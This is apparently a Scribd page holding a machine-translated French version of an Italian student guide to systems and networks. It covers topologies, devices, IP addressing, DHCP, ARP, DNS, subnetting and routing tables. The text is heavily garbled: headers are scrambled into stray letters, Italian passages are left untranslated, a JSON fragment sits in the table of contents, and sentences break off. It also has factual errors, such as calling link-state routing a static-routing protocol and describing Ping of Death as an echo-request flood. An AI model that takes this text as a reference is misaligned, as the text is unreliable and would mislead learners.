0% ont trouvé ce document utile (0 vote)
16 vues71 pages

Guide Des Systèmes Et Réseaux 1

Le document est un guide sur les systèmes et réseaux, destiné aux étudiants, qui couvre divers sujets tels que les protocoles, le routage, la sécurité informatique et la virtualisation. Il inclut des notes synthétiques, des définitions, des exercices de laboratoire et des ressources pour les examens. Ce guide sert de référence utile pour les étudiants en informatique, en complément des cours et du matériel fourni par les enseignants.

Transféré par

ScribdTranslations
Copyright
© © All Rights Reserved
Nous prenons très au sérieux les droits relatifs au contenu. Si vous pensez qu’il s’agit de votre contenu, signalez une atteinte au droit d’auteur ici.
Formats disponibles
Téléchargez aux formats PDF, TXT ou lisez en ligne sur Scribd
0% ont trouvé ce document utile (0 vote)
16 vues71 pages

Guide Des Systèmes Et Réseaux 1

Le document est un guide sur les systèmes et réseaux, destiné aux étudiants, qui couvre divers sujets tels que les protocoles, le routage, la sécurité informatique et la virtualisation. Il inclut des notes synthétiques, des définitions, des exercices de laboratoire et des ressources pour les examens. Ce guide sert de référence utile pour les étudiants en informatique, en complément des cours et du matériel fourni par les enseignants.

Transféré par

ScribdTranslations
Copyright
© © All Rights Reserved
Nous prenons très au sérieux les droits relatifs au contenu. Si vous pensez qu’il s’agit de votre contenu, signalez une atteinte au droit d’auteur ici.
Formats disponibles
Téléchargez aux formats PDF, TXT ou lisez en ligne sur Scribd

PROE

[Link]
SIM
. ONEZANELL
A

GUIDE
DE
SYST
R
È
ÉE
M
SE
T
A
EU
SX
PAR
AUTOS
TOPPSITI
É
T..U
.DA
INTS
INTRODUCTIONE ..............................................................................................4

QUELQUE CHOSE SUR LES RÉSEAUX....................................................................................5

QUELQUE CHOSE SUR LES PROTOCOLES ET LES SERVICES DE RÉSEAUE .............................................11

QUELQUE CHOSE SUR LES SOUS-RÉSEAUX, LE ROUTAGE ET LES VLAN ..............................................15

QUELQUE CHOSE SUR TCP et UDP.............................................................................20

QUELQUE CHOSE SUR LE P2P .....................................................................................22

QUELQUE CHOSE SUR LE WIFJ e ....................................................................................23

QUELQUE CHOSE SUR LA CRYPTOGRAPHIE ................................................................25

QUELQUE CHOSE SUR LE FIREWALL ET LE PROXY...............................................................28

QUELQUE CHOSE SUR LES VPN .................................................................................32

QUELQUE CHOSE SUR L'AUTHENTIFICATION DANS DES ENVIRONNEMENTS DISTRIBUÉS......................33

QUELQUE CHOSE SUR LA VIRTUALISATIONE ........................................................34

QUELQUE CHOSE SUR LA SÉCURITÉ INFORMATIQUEU n ..............................................36

APPROFONDISSEMENTS : SÉCURITÉ NATIONALE CONTRE CONFIDENTIALITÉY..........................39

L'HISTOIREA .............................................................................................................39

CINEFORUM : « CITIZENFOUR » ................................................................................40

APPROFONDISSEMENTS : VIRUS{"ALL’ULTIMO GRIDO":"À LA MODE"}

L'HISTOIREU n .............................................................................................................41

GLOSSARIO...........................................................................................................42
APPROFONDISSEMENTS : OUVERTSOURCE VS LOGICIEL LIBREO ........................43

APPROFONDISSEMENTS : CYBERGUERRE.........................................................45

CINEFORUM : "JEUX DE GUERRE"” .................................................................................45


GU
D
ID
ET
E
SH
ISÈMES
R
TÉSEAUX
POUA
RUT
É
E
O
T.S
U
O
.D
.P
T
A
P
ISNTS

L'HISTOIREA .............................................................................................................49

CINEFORUM : « LE GRAND HACK » .........................................................................50


GLOSSARIO ...........................................................................................................51
EXEMPLES DE MATÉRIAUX POUR LES ENTRETIENS ORAUX ..............................................52

NOTES DE LABORATOIRE ..........................................................................56

MACHINE VIRTUELLEJ e .............................................................................................57


OUTILS UTILES DU SHELL/TERMINAL .........................................................................58
OUTILS GÉNÉRIQUES.....................................................................................................60
OUTIL DE LINUX61
WIRESHARK...........................................................................................................65
RESSOURCES EN LIGNE ...................................................................................................69
POUR CONCLURE .........................................................................................71

LICENCE ................................................................................................................71
VERSIONE .............................................................................................................71
GU
D
IE
D
T
ESIHÈME
E
SR
TÉSEAUX
POUR
AUTO
T
SOP

T
P
SIÉ
E
STUD
A
INTS

INTRODUCTION
Loin, dans les espaces oubliés non marqués sur les cartes géographiques de la limite extrême de la Spirale Ouest
de la Galaxie, il y a un petit et insignifiant soleil jaune. En orbite autour de celui-ci, à une distance de
cent quarante-neuf millions de kilomètres, il y a une petite planète bleu-vert, dont les
formes de vie, descendues des singes, sont si incroyablement primitives qu'elles croient encore que les
les montres numériques sont une excellente invention.

Ainsi commence « Le Guide du voyageur galactique », un roman de science-fiction humoristique écrit


de Douglas Adams en 1979, une année importante, car c'est celle de la naissance de l'auteur de
ceci "Guide des Systèmes et Réseaux pour Auto-stoppeurs... et Étudiants".

Si vous avez besoin de quelque chose pendant que vous étudiez les Systèmes et Réseaux, en particulier en vue

dell’Examen d'État, ce Guide est votre référence. À l'intérieur, vous trouverez :

- notes synthétiques sur les principaux sujets de Systèmes et Réseaux (et un peu de
Télécommunications
- brèves définitions et descriptions des sujets et des termes informatiques à connaître;
- notes (très) rapides d'exercices de laboratoire;
- quelques notes sur des sujets approfondis durant le cours et non présents dans le livre de
testo
- matériaux d'exemple pour le lancement du Colloque Oral;
- notes sur des sujets de culture informatique abordés au cours des trois années (documentaires ,
film, ecc…) utiles pour l’entretien à l'Examen (par exemple pour se connecter avec « Citoyenneté et
Constitution

Cela ne remplace pas le livre, les notes et tout le reste du matériel fourni par les enseignants.
évidemment, mais cela peut être une aide précieuse lorsque le temps presse et que l'examen se
approchez-vous. En revanche, si vous êtes encore indécis sur ce que vous voulez faire de votre avenir après le Diplôme,

perchè siete in cerca della risposta alla “Domanda Fondamentale sulla Vita, l'Universo eTutto
Alors, vous devez consulter l'autre Guide, celui d'Adams, pour découvrir que la réponse
c'est simple, et c'est 42.
GUD
IE
DE
T
SIHÈME
E
ST
RÉSEAUX
POUR
AUTORS
IA
TO
IN
D
SE
ÉSTUDA
INTS

R
É
E
SA
U
L
XE
SQ
U
SU
C
R
E
H
LQ
O
U
E
SE

Topologiederéseau:latopologiephysiquedécritlastructurephysiquedesréseaux(niveaux1et2)
c'est-à-dire les dispositifs utilisés, leur emplacement, les types de canaux de transmission, les interfaces ; la topologie

la logique décrit les configurations des appareils, le routage IP, les classes d'adresses
utilisés, noms des hôtes.

Les topologies physiques classiques sont celles en étoile, en maillage (« mesh »), en anneau, en bus, à
arbre.

LAN, MAN, WAN, WLAN, PAN : termes qui divisionnent les réseaux (AN : Réseau d'aire) en
base à l'aire géographique servie : Local - Métropolitain - Étendu - Sans fil Local - Personnel.

SAN : Réseau de zone de stockage, réseau dédié au transfert de données entre serveurs et stockage.
typiquement basée sur la fibre et avec des transferts de données élevés jusqu'à 16Gbit/s.

Unité de données de protocole (PDU) : unité d'information ou paquet échangé entre deux couches dans un
protocole de communication d'une architecture de réseau en couches. Dans le TCP/IP, on l'appelle
datagramme.

Paquet : séquence de données transmises sur un réseau. Au niveau 2, on l'appelle trame, au niveau
IP/rete s'appelle datagramme (ou paquet IP), au niveau TCP s'appelle segment (mais
également un datagramme dans le cas de l'UDP).

Protocole : ensemble de règles qui supervisent la communication entre des entités du même
niveau. Définit les PDU (Unité de Données de Protocole) qui sont transférées pour communiquer
avec les messages de contrôle, formatés par un en-tête (qui contient des informations de
controllo) et un payload (qui contient les données).

Modèle ISO/OSI : c'est un modèle pour les architectures de protocoles (Système Ouvert
Interconnexion), divisé en 7 couches fonctionnelles qui communiquent en échangeant des PDU
(application, presentation, session, transport, network, data link, physical).

Le modèle définit une communication par niveaux : données deux nœuds A et B, le niveau n du nœud A
peut échanger des informations avec le niveau n du nœud B, mais pas avec les autres en utilisant un
GUD
IE
DESYSTÈMEE
ST
RÉSEAUX
POUR
AUTOT
SOPP
T

S
IIE
ÉTUDA
INTS

(contrôle logique de la connexion) et MAC (contrôle d'accès au support physique) qui


identifie avec une adresse unique les stations de réseau, composée de 6 octets (48 bits).

Ethernet : c'est la norme 802.3 pour la réalisation des LAN, connue sous le nom de CSMA/CD.

PoE : Power over Ethernet, permet d'alimenter un appareil via un câblage de


rete. Elle est particulièrement utilisée pour les dispositifs employés dans les réseaux WiFi.[1923]

Fast Ethernet 100BASE-TX Gigabit Ethernet 1000BASE-TX : technologies de réseau


utilisés pour les câblages les plus courants.

Domaine de diffusion : ensemble d'hôtes dans un réseau qui peuvent communiquer au niveau.

Domaine de collision : ensemble d'hôtes qui accèdent au même moyen de transmission sur lequel
ils veulent transmettre des données.

CSMA/CD : protocole d'accès multiple pour la résolution des collisions sur les réseaux locaux
câblage de type diffusion. Un hôte ne peut utiliser le réseau Ethernet que si personne d'autre ne le fait.
il utilise déjà, grâce à un mécanisme d'écoute du moyen.

Dorsale ou Backbone : connexion à haute vitesse entre deux serveurs ou routeurs de commutation
les informations relient typiquement des tronçons de réseau avec une vitesse et une capacité inférieures grâce à
mécanismes de multiplication.

802.11 : norme IEEE pour la transmission sans fil dans les réseaux WLAN, également connu sous le nom de

WiFi.

Suite TCP/IP:definisce gli standard degli strati funzionali application, transport e internet
(réseau).

L'encapsulation : c'est la procédure par laquelle une donnée générée par un processus utilisateur traverse les

couches du modèle ISO/OSI.

Unicast : communication un à un.

Multidiffusion : communication de un à plusieurs.


GUD
IE
DE
T
SIHÈME
E
ST
RÉSEAUX
POUR
AUTO
TOPP

T
S
IET
ÉTUDA
INTS

Classes d'adresses IPv4 : elles sont regroupées en fonction de la valeur des bits les plus significatifs en 5 classes.
Par principe, ils identifient l'extension d'un réseau en fonction de l'adresse IP à laquelle ils appartiennent. Pour trouver

la classe d'appartenance nécessite de convertir en binaire le premier octet, et de voir la valeur des
un peu plus significatifs.

• Classe A: inizia con 0, subnet: /8 blocchi: da 0 a 127

• Classe B : commence par 10, sous-réseau : /16 blocs : de 128 à 191

• Classe C : commence par 110, sous-réseau : /24 blocs : de 192 à 223

• Classe D : commence par 1110, sous-réseau : non défini, blocs : de 224 à 239, utilisé pour le multicast

• Classe E : commence par 1111, sous-réseau : non défini, blocs : de 240 à 255, réservé pour des usages
futurs

Adresses IPv4 particulières et réservées : [Link] (adresse IP non spécifiée, identifie


"cet hôte"), l'adresse de l'hôte avec tous les bits à 0 (X.X.X.0) indique le réseau actuel, de
[Link] à [Link] (loopback, répond le ordinateur sur lequel on travaille)
[Link] (diffusion à tous les adresses du réseau actuel).

Adresses IPv4 non valides : ce sont celles dont le NET-ID ou le HOST-ID est constitué de tous des bits à 0 ou à

1, qui ne peuvent pas être attribués à un hôte, ou réservés.

Les réseaux privés : ils ne sont pas connectés directement à Internet, ils peuvent utiliser les suivants

groupes d'adresses réservées :

• de [Link] à [Link] (Classe A)

• de [Link] à [Link] (Classe B)

• de [Link] à [Link] (Classe C)

Les adresses IPv6 : elles sont composées de 128 bits, répartis en 8 champs de 16 bits séparés par des deux-points.

espressi en hexadécimal (ex. hhhh:0000:0000:hhh[Link]), un bloc


composé de 4 bits à 0 est synthétisé en un seul 0, les bits à 0 les plus à gauche d'un groupe et les
GU
D
IE
DE
T
SIHÈME
E
ST
RÉSEAUX
POUR
AUTO
T
SOP…
T
P
SIE
ÉTUD
A
INTS

Les groupes sont assignés par l'IEEE et identifient le fabricant, les autres le numéro de série du
dispositif (ex. [Link]) [1920]. L'adresse [Link] est utilisée
pour la diffusion. Certaines adresses sont réservées selon les spécifications dictées par l'organisme IANA.

IP vs MAC : le premier indique comment un hôte est connecté à un réseau, le second identifie l’hôte.
physique.

Hub : dispositif de niveau 1, connecte plusieurs appareils via un port réseau LAN, crée un
unico dominio di collisione, lavora in half-duplex, replica i bit trasmessi. Ha funzione di
amplification de signal, par conséquent, il est souvent utilisé sur des réseaux avec de très longs câbles.

Switch : dispositif de niveau 2, transmet les données sur le port auquel le destinataire est connecté, fonctionne
en duplex intégral, maintient une table avec l'association entre les adresses MAC et les ports,
Typiquement, il peut avoir jusqu'à un peu plus de 100 ports. Il est équipé de micrologiciel et est souvent

administrable (rendant ainsi plus efficace et en même temps plus vulnérable par rapport à
un hub). Cela permet de réduire considérablement les collisions, mais nécessite la connexion de
chaque nœud individuel au commutateur, ou les nœuds à hub connectés au commutateur. Crée un domaine
de collision séparé pour chaque port. Il ne peut pas interconnecter des réseaux utilisant
protocoles de communication différents (par exemple un réseau Token Ring et un Ethernet).

Bridge:dispositivo di livello 2, collega segmenti di rete, effettua filtraggio e inoltro dei


pacchetti, peut avoir une dizaine de ports au maximum, essaie de comprendre à partir de l'adresse du
destinataire le segment de réseau auquel il appartient en maintenant une table de transfert de
adresses MAC pour chaque port. Il est capable de vérifier si sur un autre segment de réseau sur
qui doit transmettre existe un problème de collision, dans ce cas utilise CSMA/CD
en mettant en mémoire tampon les données et en les envoyant ensuite à un LAN libre. À l'allumage, les tables de
les transferts sont vides et le cadre est transmis sur toutes les lignes sauf celle de
arrivo (inondation). Généralement, cela relie entre eux deux ou plusieurs segments d'un réseau du même
type ou deux ou plusieurs réseaux de types différents, régulant le passage des trames d'un à l'autre
sur la base de l'adresse de destination contenue dans ces derniers.

Différence entre un bridge et un switch : par rapport au bridge, le switch exécute toutes ses propres
élaborations via matériel et non logiciel, donc ne ralentit pas le flux de trafic entre les
segments de réseau.
GU
D
IE
DT
E
SIHÈME
E
ST
RÉSEAUX
POUR
AUTO
T
SOP…
T
P
SIE
É
TUD
A
INTS

Routeur : dispositif de niveau 3, il dirige les données entre des réseaux physiques différents. Lorsqu'il reçoit un

le paquet résout l'adresse logique en adresse physique et crée une trame directe vers le routeur suivant
(prochain saut), en cas de routage dynamique, communique avec les autres routeurs du réseau. Dans
cas dans lequel un routeur avec un routage statique doit envoyer des données à un réseau auquel il n'est pas

connesso invia i dati al gateway predefinito. E’ dotato di firmware. Tipicamente ha 4 porte.

Uplink : c'est un port utilisé pour transmettre des données d'un hôte à un commutateur, un routeur, un hub
ou une dorsale, ou pour relier entre eux des hubs via des câbles croisés.

Segment de réseau : portion de réseau séparée des autres par un dispositif de réseau (hub,
commutateur, pont)

Modem : MOdulatore - DEModulatore, est généralement un dispositif de liaison à un


réseau de données qui module les signaux numériques en analogiques lors de la transmission (de l'ordinateur à la ligne

telefonica par exemple) et en réception démodule les signaux analogiques en digitaux.

Point d'accès (AP) : permet d'accéder à un réseau en mode sans fil, généralement
par onde radio. Il peut être connecté à d'autres AP pour étendre un réseau sans fil,
permettant aux dispositifs qui l'utilisent de rester connectés même en se déplaçant
changement AP ou canal (transfert).

Câblage Structuré : standard utilisé dans les bâtiments destinés aux bureaux pour la réalisation
des installations de réseau, généralement basées sur des câbles de catégorie 5 ou supérieure et des connecteurs
RJ-45, avec possibilité d'utilisation de la fibre optique pour les liaisons de raccordement. Les câbles ont une
longueur maximale de 100 mètres. Pour chaque point à desservir, un ou plusieurs sont posés.
cavi dans des canalisations appropriées dans les murs, les faux plafonds ou les sols du bâtiment,
jusqu'à atteindre un armoire de distribution de étage (Distributeur de Sol, FD, c'est-à-dire
câblage horizontal) également connu sous le nom de comerack. Les FD sont connectés à un armoire de
bâtiment (Distributeur de bâtiment, BD), via des câbles en cuivre ou en fibre optique (câblage
verticale). De la même manière, les différents bâtiments d'un soi-disant "campus" sont reliés à un
Campus Distributor, CD. Les locaux qui accueillent les armoires de distribution devraient
avoir des caractéristiques adéquates pour l'alimentation électrique (de préférence protégée par un groupe
di continuité - UPS), climatisation, contrôle d'accès du personnel. On distingue entre
câblage vertical (câblage de bâtiment) et horizontal (de étage).
GUD
IE
DESYSTÈMED
SE
THÈMEE
ST
DE
RÉSEAUX
POUR
LEÉ
STUDA
INTS

FAI : Fournisseur d'accès Internet, entreprise ou société qui fournit des services liés à Internet.

Nœud : chaque élément matériel d'un réseau capable de communiquer. Cela peut être un élément
de tri du trafic (par exemple un hub) ou un élément terminal comme un client ou
un serveur.

Hôte : nœud terminal du réseau. Cela signifie “invité”, cela peut être un client ou un serveur.
GU
D
IE
DE
SUJET
E
SIT
RÉSEAUX
POUR
AUTO
T
SOP…
T
P
SIE
ÉTUD
A
INTS

P
R
Q
OU
L
TE
O
C
S
L
U
E
C
Q
HT
R
O
UL
E
SE
S
SERVC
IED
SE
RÉSEAU
Client/Serveur : c'est un modèle composé de processus s'exécutant sur des hôtes différents. Les processus
qui gèrent et mettent à disposition des ressources sont appelés serveurs tandis que ceux qui en
Ceux qui demandent l'accès sont appelés clients.

Architecture distribuée : c'est un système dans lequel le traitement des informations est distribué
sur plusieurs ordinateurs, dont les composants coopèrent en communiquant en réseau et en se coordonnant

propre actions via l'échange de messages. Elles se caractérisent par une grande scalabilité
(possibilité d'ajouter des ressources pour améliorer les performances et mieux supporter les charges de)
travail) et de tolérance aux pannes grâce à la possibilité de répliquer les ressources. Le développement de
les systèmes logiciels distribués se font par l'utilisation de middleware, une couche logicielle
qui se situe entre le système d'exploitation et les programmes applicatifs.

DHCP : c'est un protocole qui permet aux hôtes de recevoir une configuration IP complète
pour accéder à un réseau auquel ils sont connectés. Le service est fourni par un serveur dédié (ou
d'un routeur qui offre ce service). Typiquement, il fonctionne en trois modes :

• statique : l'administrateur réseau configure sur le serveur les associations entre l'adresse IP et le MAC
Adresse;

• automatique : l'administrateur définit une plage d'adresses attribuables par le serveur, et l'IP
est ensuite associé à l'hôte sans date d'expiration fixée;

• dynamique : l'administrateur définit une plage d'adresses attribuables par le serveur, et l'IP
il est ensuite associé à l'hôte pour une durée déterminée pour l'expiration (temps de location).

La procédure d'attribution de l'adresse IP et de la configuration se fait par le biais de


échange de 4 messages :

• DHCP DISCOVER (l'hôte envoie un paquet depuis l'adresse [Link] à destination de


diffusion sur tout le réseau [Link] à la recherche d'un serveur DHCP)
GU
D
IE
DT
E
SIHÈME
E
ST
RÉSEAUX
POUR
AUTO
T
SOP…
T
P
SIE
É
TUD
A
INTS

• DHCP ACK (est envoyé par le serveur à l'hôte confirmant les paramètres de configuration
offerts, après avoir effectué un ping sur le réseau pour vérifier qu'aucun autre hôte ne s
vous êtes connecté avec la même adresse IP entre-temps).

Le renouvellement de l'adresse IP en cas de lesse time est effectué par l'hôte avec un nouveau DHCP
Le DHCP présente certaines vulnérabilités : la Starvation d'adresse, qui consiste
en envoyant de fausses requêtes DHCP pour saturer les plages d'adresses IP disponibles,
empêchant de nouveaux hôtes légitimes de se connecter au réseau, et la technique du Rogue Server, avec la
comment insérer un faux serveur DHCP auquel connecter les machines du réseau
détournant le trafic.

ARP : c'est le protocole qui s'occupe de gérer les correspondances entre les adresses IP et les adresses Mac
dans un réseau. Chaque hôte encapsule les paquets envoyés dans des trames dans lesquelles il doit insérer l'adresse.
Adresse Mac du destinataire, qui est dérivée de tableaux appropriés contenant les associations
IP-Mac detteARPTable. Typiquement, la table ARP est mise à jour de trois manières : en surveillant
le trafic réseau en déduisant les associations à partir des trames en transit ; en émettant un ARP
DEMANDE en broadcast qui demande quel hôte a une adresse IP déterminée, recevant une
réponse ARP REPLY et mise à jour de la table, avec une durée typique de l'enregistrement de 120
secondi dans les commutateurs ; ou en mémorisant manuellement des paires IP-MAC sans expiration
(option rare). Le protocole a deux problématiques :

• puisque les demandes ARP sont effectuées en broadcast, des situations peuvent se produire
d'un trafic intense lorsque de nombreux appareils accèdent simultanément au réseau;

• est vulnérable aux attaques de type ARP Spoofing (ou ARP Poisoning) dans lesquelles un hôte introduit
réponse ARP fausse sur le réseau pour modifier correctement les tables ARP, permettant un
situation de MITM (Man In The Middle) interceptant le trafic entre les hôtes. L'hôte A
communique avec B, mais en réalité l'hôte C attaquant se trouve au milieu et ce que réellement
A communique avec C, qui retransmet à B.

NAT : la traduction d'adresse réseau est un service qui permet de transformer une adresse
IP de la LAN en une adresse IP publique en modifiant l'en-tête IP des paquets de données. Cela est
utilisé généralement à l'intérieur d'un réseau privé, où l'appareil chargé de
NAT (en général un routeur) associe aux ordinateurs qui en font la demande une adresse publique
GU
D
IE
DE
SU
S
IJET
E
ST
RÉSEAUX
POUR
AUTO
T
SOP…
T
P
SIE
ÉTUD
A
INTS

sont introduites dans les réseaux de fausses associations NAT, qui redirigent le trafic de la
reste selon les désirs de l'attaquant.

ICMP : Internet Control Message Protocol est un protocole de contrôle utilisé par les nœuds pour
lo scambio di messaggi di errore e informazioni sullo stato della rete. Il più noto è il
commandePINGqui sert à envoyer des paquets de type ECHO REQUEST et à recevoir des
ECHO REPLY pour déterminer si un hôte est actif, en calculant également le temps de réponse. Le
le protocole peut s'avérer vulnérable aux attaques de type Ping of Death, où un excès de
La DEMANDE ECHO entraîne une surcharge du réseau et, dans certains cas, le plantage des hôtes.

DNS : Système de noms de domaine, sert à traduire les noms de [Link]) dans les adresses
IP. Le DNS est organisé en arbre, le point d'origine est indiqué par un point « . » et est
dettoroot, ci-dessous sont indiqués les noms des branches de l'arbre et chaque "." représente une
diramazione.

Exemple :[Link]

• .it est le domaine de premier niveau (IANA en maintient la liste :[Link]


racine/db), peut représenter une nation (.it) ou une organisation (.com, domaines
commerciales).

• google est le 2° niveau (ou sous-domaine), représente le propriétaire du nom de domaine.

• www est le 3ème niveau, peut être choisi par le propriétaire et sert généralement à identifier un
servizio offerto ([Link] per il sito web,[Link] le serveur de messagerie
sortie, etc...)

URI : Identifiant de ressource uniforme, identifie une ressource de manière unique sur Internet.
la première partie indique le protocole à utiliser. Exemple [Link]

URL : Localisateur Uniforme de Ressource est une spécification d'un URI par lequel on indique la
localisation précise d'une ressource sur internet. Exemple [Link]

FTP : Protocole de Transfert de Fichiers, protocole pour le transfert de fichiers. Il est basé sur TCP et a un
architecture client/serveur. Utilise le port 21 pour établir une connexion de contrôle, dans
GUD
IE
DE
T
SIHÈME
E
ST
RÉSEAUX
POUR
AUTO
T
SOPP

T
S
IEÉTUDA
INTS

POP3 : le Protocole de Bureau de Poste est un protocole pour la consultation des courriers électroniques.
utilisé pour recevoir des e-mails d'un serveur distant dans un client local pour les lire hors ligne (à
exemple Outlook, Mac Mail, Mozilla Thunderbird). Utilise le port 110 (995 en mode
sûre via SSL/TLS, elle ne fournit pas de cryptage par défaut.

IMAP : le protocole d'accès aux messages Internet est un protocole pour la consultation des courriels
électronique, utilisé pour un accès direct à une boîte mail sur un serveur distant d'un
locale client (par exemple le navigateur), sans demander le téléchargement des messages. La
le courrier est consulté directement sur le serveur. Il utilise le port 143 (993 en mode sécurisé)
via SSL/TLS, ne fournit pas de chiffrement par défaut).

SMTP : Protocole de transfert de courrier simple est le protocole pour l'envoi de courriers électroniques.
Utilisez le port 25 (465 en mode sécurisé via SSL/TLS, de base il ne fournit pas de cryptage).

TLSedSSL : La sécurité des transports et les couches de sockets sécurisées sont des protocoles cryptographiques pour

crypter et authentifier une connexion lors du transfert de données sur Internet, via
l'utilisation de certificats. TLS est une version récente de SSL.
GU
D
ID
EE
SY
SSTÈMES
R
TÉSEAUX
POUR
LE
A
SUTO
T
S
O…
P
TP
S

ETUD
A
INTS

R
O
S
É
E
A
U
-SX
,L
E
SUSRC
H
Q
O
UE
S
L
Q
UE

ROUTÉ
N
IV
EL
IAN
Sous-réseautage : technique qui permet de diviser un réseau en sous-réseaux grâce à l'utilisation d'une
masque de sous-réseau.

Masque de sous-réseau : est constitué de 4 octets de bits (comme une adresse IP), le masque de sous-réseau est
composée de bits à 1 pour le Net-ID et pour la sous-réseau d'appartenance, et à 0 pour la partie Hôte-
ID, e viarp -ene messa en AND bit à bit avec l'adresse IP du destinataire d'un paquet,
permettant d'extraire la sous-réseau d'appartenance. Pour la détermination du sous-réseau
des masques utilisent les bits les plus significatifs de l'Host-ID de l'adresse IP.

- Exemple : adresse réseau [Link]. Étant de classe C, 8 bits peuvent être utilisés pour l'ID de l'hôte (256
hôte). En choisissant le 1er bit de l'ID hôte pour le masque de sous-réseau, on obtient (en binaire) :
11111111. 11111111. 11111111.10000000 c'est-à-dire [Link]
en utilisant 1 bit pour le sous-réseau, on peut réaliser 2^1=2 sous-réseaux, chacun de 2^7=128 hôtes (-2
hôtes chacun retirés les adresses réseau et de diffusion).

- Exemple : adresse réseau [Link]. Étant de classe B, 16 bits peuvent être utilisés pour l'Host-ID.
(65.536 hôtes). En choisissant les 4 premiers bits de l'Host-ID pour le masque de sous-réseau, on obtient (en binaire) :

11111111. 11111111. 11110000. 00000000 ou [Link]


utilizzando 4 bit per la subnet si possono realizzare 2^4=16 sottoreti, ognuna di 2^12=4096 host
(-2 hôtes chacun retiré les adresses de réseau et de diffusion).

VLSM : technique qui permet d'utiliser des sous-réseaux de longueurs différentes au sein du même
adresse réseau.

- Exemple : adresse réseau [Link]. Je peux utiliser un masque de 1 bit pour diviser le réseau en 2
sous-réseaux de 128 hôtes, et utiliser 2 bits dans la plage d'adresses pour le deuxième sous-réseau pour diviser le
segmenter en 2 sous-réseaux supplémentaires de 64 hôtes :

[Link] / [Link]
hôte sous-réseau n°1 : de [Link] à [Link]
[Link] / [Link]
GU
D
IE
D
T
ESIHÈME
E
SR
TÉSEAUX
POUR
AUTO
E
É
T
S
.T
O
U
.P
.D
T
P
S
A
INTS

Sans classe : indique le routage sans classes d'appartenance IP (et permet donc de
choisir librement les masques de sous-réseau et les adresses).

CIDR : Le routage inter-domaine sans classe identifie l'agrégation de sous-réseaux (opération


cela également disupernetting). En utilisant un adressage sans classe, il est possible d'utiliser les
bit par le masque de sous-réseau de manière "libre". Utilisez la notation adresse IP/numéro de bits
pour indiquer la longueur du masque de sous-réseau.

- Exemple : [Link]/22 indique que le masque de sous-réseau utilise 22 bits, donc


11111111. 11111111. 11111100.00000000 ou [Link]

Piano d'adressage complet : il prévoit de spécifier pour le projet de réseau attribué


indirizzo di rete, indirizzo di broadcast, range di indirizzi disponibili, range di indirizzi
assignés/réservés, adresses IP de chaque hôte ou dispositif présent dans le réseau, et les sous-réseaux
masque.

Le routage : c'est l'opération d'acheminement des messages effectuée par les routeurs. Il comprend 2 phases :

- calcul (routage) du chemin optimal, basé sur les informations présentes dans les tableaux de
routage

- Le transfert (forwarding) du paquet vers l’interface de sortie du routeur choisie. Dès que
Après avoir acquis l'adresse IP du paquet, le routeur vérifie sa propre netmask et détermine si
il est relatif à un hôte de son propre réseau, dans ce cas, il utilisera les services du niveau 2 pour
transférer le paquet directement à l'hôte destinataire (routage direct); sinon, si c'est
destiné à un autre réseau consulte sa propreRoutingTable, s'il est connecté au réseau
transférez directement le paquet, sinon il l'enverra au routeur indiqué par le tableau ou à
celui par défaut, qui répétera le processus (routage indirect).

Tabella di Routing: è la tabella utilizzata dai router per effettuare l’instradamento.


Contient :

- un enregistrement pour chaque réseau connecté directement au routeur, avec l'indication de la


interface réseau relative;
GUD
IE
DESYSTÈMEE
ST
RÉSEAUX
POUR
AUTODD
IACTE…
SET
ÉTUDA
INTS

- dans le cas où le routage est direct, un astérisque est inséré comme Prochain Saut, tandis que
dans le cas de réseaux inconnus, on indique par défaut le réseau de destination et par /0 le sous-réseau
masque.

- Les tableaux sont lus « de haut en bas », il est donc important de faire
attention aux masques de sous-réseau et à la position de la passerelle par défaut (dernière position).

- généralement, les interfaces réseau d'un routeur (s'il a 4 ports) sont indiquées par des points
cardinaux N,S,O,E (en anglais N,S,W,E).

Exemple de tableau d'un réseau avec deux routeurs, R1 et R2 :

Routeur Réseau de destination Masque Passerelle/Saut Suivant Interface

R1 [Link] /26 * S

R1 [Link] /25 * N

R1 par défaut / [Link] /0 [Link] S

R2 [Link] /24 * O

R2 [Link] /16 * S

R2 [Link] /15 [Link] S

R2 [Link] /13 [Link] N

R2 par défaut /0 [Link] E

Hop : saut, indique le passage d'un dispositif de routage le long du parcours de


un paquet.

Coût : représente la somme des coûts des lignes traversées, il est inversement proportionnel
à sa vitesse, qui est liée à la bande passante, au type et à la fiabilité du moyen de transmission,
longueur du parcours, trafic de réseau.

Routage statique : les chemins pour le routage des paquets sont déterminés par l'administrateur
de réseau, qui configure manuellement les tables de routage. C'est simple à réaliser sur des réseaux de
petites dimensions et avec une faible redondance de connexions, à mesure que la taille augmente
du réseau devient difficile à gérer. De par sa nature, elle présente une faible tolérance aux pannes, et à
Chaque variation de la topologie du réseau impose la reconfiguration des tables dans les nœuds.
GUD
IE
ST
S
IHÈMEE
ST
RÉSEAUX
POUR
AUTOT
SOPPT
S
I…
IE
ÉTUDA
INTS

Routage hiérarchique : il est utilisé à grande échelle sur le réseau Internet et prévoit justement la
réalisation d'une hiérarchie de zones de routage structurées en régions appelées Autonomes
Système (AS), qui peuvent être subdivisées en portions appelées zone de routage
(RA) interconnectés par des dorsales (backbone). Les différentes entités de gestion s'accordent sur lesquels
protocoles à utiliser pour le dialogue entre les routeurs qui interconnectent des AS différents. Les protocoles de
Le routage à l'intérieur d'un AS est appelé Protocole de Passerelle Interne (IGP), tandis que ceux entre les
Les protocoles de passerelle extérieure (EGP) sont dits vari AS. Chaque routeur maintient les informations
pour toutes les destinations à l'intérieur de l'AS où elle se trouve, tandis que pour toutes les autres
les destinations envoient les paquets à un routeur à la périphérie de l'AS qui s'en occupe
de l'acheminement vers d'autres AS. Sert à maintenir les tables de routage réduites dans les réseaux de
dimensions élevées.

Routage par état de lien ; protocole utilisé dans le routage statique qui se base sur l'état des
liens entre les nœuds. Des paquets LSP (Link) sont envoyés en inondation à chaque routeur.
Paquets d'état contenant l'état de chaque lien, l'identité de chaque voisin et les coûts des liens
connectés au nœud qui l'envoie. Utilise l'algorithme de Dijkstra (Shortest Path First) pour le
calcul du chemin le plus court. Tous les nœuds conservent une copie entière de la carte de la
rete et exécutent un calcul complet avec l'algorithme de Dijkstra des meilleurs parcours,
par conséquent, le calcul n'est pas distribué.

DistanceVector Routing : protocole utilisé dans le routage dynamique où un message est envoyé.
table de routage d'un routeur à tous les routeurs voisins sous forme de vecteur, avec indiqués les
coûts de connexion.

Exemple : le vecteur du routeur A [A-0, B-2, C-4, D-2] indique que le routeur A a un routage direct (local, coût
zéro), envoyer au routeur B coûte 2, et ainsi de suite.

C'est un algorithme itératif, distribué et asynchrone (il ne nécessite pas que les nœuds opèrent en
